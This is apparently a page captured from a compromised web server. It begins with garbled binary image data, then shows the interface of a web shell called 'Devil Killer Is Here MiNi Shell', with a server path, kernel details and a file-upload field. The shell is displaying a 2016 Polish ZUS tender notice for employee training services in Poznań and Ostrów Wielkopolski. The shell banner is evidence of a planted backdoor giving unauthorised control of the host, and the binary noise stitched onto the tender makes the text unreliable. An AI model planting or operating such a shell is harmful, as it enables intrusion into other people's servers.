JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160303/47890-N-2016.html

<p class="kh_header"><b>Poznań: Usługi szkoleniowe dla pracowników Zakładu Ubezpieczeń Społecznych:
I Oddziału w Poznaniu, II Oddziału w Poznaniu i Oddziału w Ostrowie Wielkopolskim</b><br>
<b>Numer ogłoszenia: 47890 - 2016; data zamieszczenia: 03.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych II Oddział w Poznaniu , ul. Starołęcka 31, 61-361 Poznań, woj. wielkopolskie, tel. 61 8745400, faks 61 8772850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla pracowników Zakładu Ubezpieczeń Społecznych:
I Oddziału w Poznaniu, II Oddziału w Poznaniu i Oddziału w Ostrowie Wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi szkoleniowe dla pracowników Zakładu Ubezpieczeń Społecznych: I Oddziału w Poznaniu, II Oddziału w Poznaniu i Oddziału w Ostrowie Wielkopolskim - 8 części.
2. Zakres niniejszego zamówienia obejmuje zorganizowanie i przeprowadzenie szkoleń dla następujących 8 części:
2.1.  Część I:
- temat szkolenia:  Sposoby minimalizowania stresu w pracy zespołowej.
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń zamkniętych dla kadry menadżerskiej I Oddziału ZUS w Poznaniu. 
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/I do SIWZ.

2.2.  Część II:
- 3 tematy szkolenia:  Radzenie sobie ze stresem w pracy z klientem, Podejście do klienta - umiejętność dostosowania się do typu klienta i sytuacji obsługi, Utrwalenie postawy asertywnej w kontaktach z klientami;
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń zamkniętych dla pracowników obsługi klientów I Oddziału ZUS w Poznaniu.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/II do SIWZ.
2.3.  Część III:
- temat szkolenia: Doskonalenie umiejętności komunikacji z klientem;
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkolenia dla pracowników II Oddziału ZUS w Poznaniu - dla pracowników Sali Obsługi Klienta.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/III do SIWZ.
2.4.  Część IV:
- temat szkolenia: Skuteczne rozmowy menedżera;
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkoleń dla pracowników II Oddziału ZUS w Poznaniu - dla kadry kierowniczej.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/IV do SIWZ.
2.5.  Część V:
- temat szkolenia: Poprawne formy komunikacji z klientem wewnętrznym i zewnętrznym (poprawna i skuteczna polszczyzna w komunikacji urzędowej); 
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkolenia dla pracowników II Oddziału ZUS w Poznaniu.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/V do SIWZ.
2.6.  Część VI:
- temat szkolenia: Zarządzanie projektami;
- przedmiot zamówienia obejmuje przygotowanie i przeprowadzenie szkolenia dla pracowników II Oddziału ZUS w Poznaniu.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/VI do SIWZ.

2.7.  Część VII:
- temat szkolenia: Radzenie sobie ze stresem w pracy z klientem;
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń, których uczestnikami będą pracownicy Zakładu Ubezpieczeń Społecznych Oddział w Ostrowie Wielkopolskim.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/VII do SIWZ.
2.8.  Część VIII:
- temat szkolenia: Sposoby minimalizowania stresu w pracy zespołowej
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń, których uczestnikami będą pracownicy Zakładu Ubezpieczeń Społecznych Oddział w Ostrowie Wielkopolskim.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/VIII do SIWZ.
3. Zamawiający dopuszcza składanie ofert częściowych określonych w art. 2 pkt 6 ustawy Prawo zamówień publicznych. Wykonawca może złożyć ofertę/y na dowolną część / dowolne części przedmiotowego zamówienia.
Oferta złożona na daną część przedmiotu zamówienia musi obejmować zrealizowanie całości zamówienia dla tej części. 
4. Szczegółowy opis przedmiotu zamówienia stanowią odpowiednio do danej części zamówienia  załączniki od  nr 1/I do 1/VIII  do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium dla żadnej części postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I - VIII przedmiotu zamówienia:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 usługi polegające na przygotowaniu i przeprowadzeniu szkolenia dla co najmniej 10 osób (przeszkolonych jednorazowo), wykonywanych przez okres dwóch kolejnych dni (każda z usług).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla Części I - VIII przedmiotu zamówienia:
Zamawiający nie formułuje szczegółowego warunku w tym zakresie. Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Pzp - sporządzone na załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla Części I, IV przedmiotu zamówienia:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą doświadczenie polegające na przeprowadzeniu co najmniej 100 godzin szkoleniowych w zakresie zarządzania zespołem, przeprowadzonych do kadry kierowniczej w administracji publicznej.
- Dla Części II, III przedmiotu zamówienia:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą doświadczenie polegające na przeprowadzeniu co najmniej 100 godzin szkoleniowych w zakresie technik obsługi klientów przeprowadzonych w administracji publicznej obsługującej klientów.
- Dla Części V:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą doświadczenie polegające na przeprowadzeniu co najmniej 100 godzin szkoleniowych w zakresie komunikacji z klientem przeprowadzonych w administracji publicznej.
- Dla Części VI:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą doświadczenie polegające na przeprowadzeniu co najmniej 100 godzin szkoleniowych z zakresu zarządzania projektami przeprowadzonych w administracji publicznej.
- Dla Części VII:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwoma osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi doświadczenie polegające na przeprowadzeniu co najmniej 100 godzin szkoleniowych (każda z tych osób) w zakresie komunikacji interpersonalnej, przeprowadzonych w administracji publicznej.
- Dla Części VIII:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwoma osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi doświadczenie polegające na przeprowadzeniu co najmniej 100 godzin szkoleniowych (każda z tych osób) w zakresie zarządzania zespołem lub motywowania pracowników, adresowanych do kadry zarządczej lub kierującej, przeprowadzonych w administracji publicznej


UWAGA:
- Pod pojęciem administracji publicznej rozumie się ogół podmiotów administracji, a więc organy administracji i inne podmioty wykonujące określone funkcje z zakresu administracji publicznej, finansowane ze środków publicznych, z wyłączeniem przedsiębiorstw, banków, instytutów badawczych i spółek prawa handlowego.
- Zamawiający przyjmuje, że 1 godzina szkoleniowa = 45 minut.
- W przypadku składania przez Wykonawcę ofert na realizację kilku części przedmiotu zamówienia, Wykonawca powinien mieć na uwadze fakt, iż terminy realizacji poszczególnych części zamówienia pokrywają się, co powoduje, że w przypadku wybrania oferty Wykonawcy jako najkorzystniejszej w tych częściach, w celu prawidłowej realizacji przedmiotu zamówienia Wykonawca będzie zobowiązany dysponować odpowiednią liczbą osób (trenerów).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla Części I - VIII przedmiotu zamówienia:
Zamawiający nie formułuje szczegółowego warunku w tym zakresie. Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Pzp - sporządzone na załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca nie spełnia samodzielnie warunków udziału w postępowaniu a wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności załączając do oferty pisemne zobowiązanie tych podmiotów (w oryginale, podpisane przez osobę upoważnioną do reprezentacji tego podmiotu) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Treść zobowiązania powinna określać podmiot, który oddaje zasoby do dyspozycji, wskazanie jakie zasoby zostaną udostępnione oraz sposób udostępnienia zasobów, a w przypadku polegania na wiedzy i doświadczeniu zobowiązanie podmiotu trzeciego do uczestnictwa w realizacji przedmiotu zamówienia z podaniem zakresu i okresu udziału tego podmiotu w realizacji przedmiotu zamówienia (przy czym okres ten nie może być krótszy niż termin realizacji zamówienia dla poszczególnych części).

Wykonawca powołujący się na zasoby innych podmiotów w zakresie ich wiedzy
i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych w celu wykazania spełniania warunków udziału w postepowaniu, którym to podmiotom zamierza powierzyć realizację części niniejszego zamówienia w charakterze swojego podwykonawcy, zobowiązany jest podać nazwy (firmy) podwykonawców wraz z powierzonym zakresem zamówienia - według załącznika nr 9 do SIWZ.
2. Oświadczenie dotyczące wskazania przez wykonawcę części zamówienia, której wykonanie powierzy podwykonawcom, sporządzone wg wzoru stanowiącego załącznik nr 9 do SIWZ - w przypadku gdy Wykonawca zamierza powierzyć wykonanie zamówienia podwykonawcom,
3. Pełnomocnictwo - jeżeli dotyczy.
W przypadku gdy Wykonawcę lub Wykonawców ubiegających się wspólnie o zamówienie reprezentuje pełnomocnik, do oferty należy załączyć pełnomocnictwo określające zakres umocowania pełnomocnika, w oryginale lub notarialnie poświadczonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie zawodowe trenerów - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy wynikających z następujących okoliczności:
- zmiana bezwzględnych przepisów prawa, na podstawie których realizowana jest umowa,
- wystąpienie siły wyższej,
- zmiany organizacyjne w ZUS,
- zmiany korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZUS II Oddział Poznań, ul. Starołęcka 31, 61-361 Poznań, bud. B, pok. 347 - osobiście lub na wniosek Wykonawcy przesłany na nr fax: 61-877-28-50. SIWZ bezpłatne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2016 godzina 11:00, miejsce: Zakład Ubezpieczeń Społecznych II Oddział w Poznaniu, ul. Starołęcka 31, 61-361 Poznań, budynek A,
sekretariat, piętro I, pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkoleń w temacie: Sposoby minimalizowania stresu w pracy zespołowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - temat szkolenia: Sposoby minimalizowania stresu w pracy zespołowej.
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń zamkniętych dla kadry menadżerskiej I Oddziału ZUS w Poznaniu. 
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/I do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkoleń w 3 tematach: Radzenie sobie ze stresem w pracy z klientem, Podejście do klienta - umiejętność dostosowania się do typu klienta i sytuacji obsługi, Utrwalenie postawy asertywnej w kontaktach z klientami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - 3 tematy szkolenia: Radzenie sobie ze stresem w pracy z klientem, Podejście do klienta - umiejętność dostosowania się do typu klienta i sytuacji obsługi, Utrwalenie postawy asertywnej w kontaktach z klientami;
- przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie dwudniowych szkoleń zamkniętych dla pracowników obsługi klientów I Oddziału ZUS w Poznaniu.
- Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1/II do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie zawodowe trenerów - 30</li>
</ul>
</li>
</ul><br>
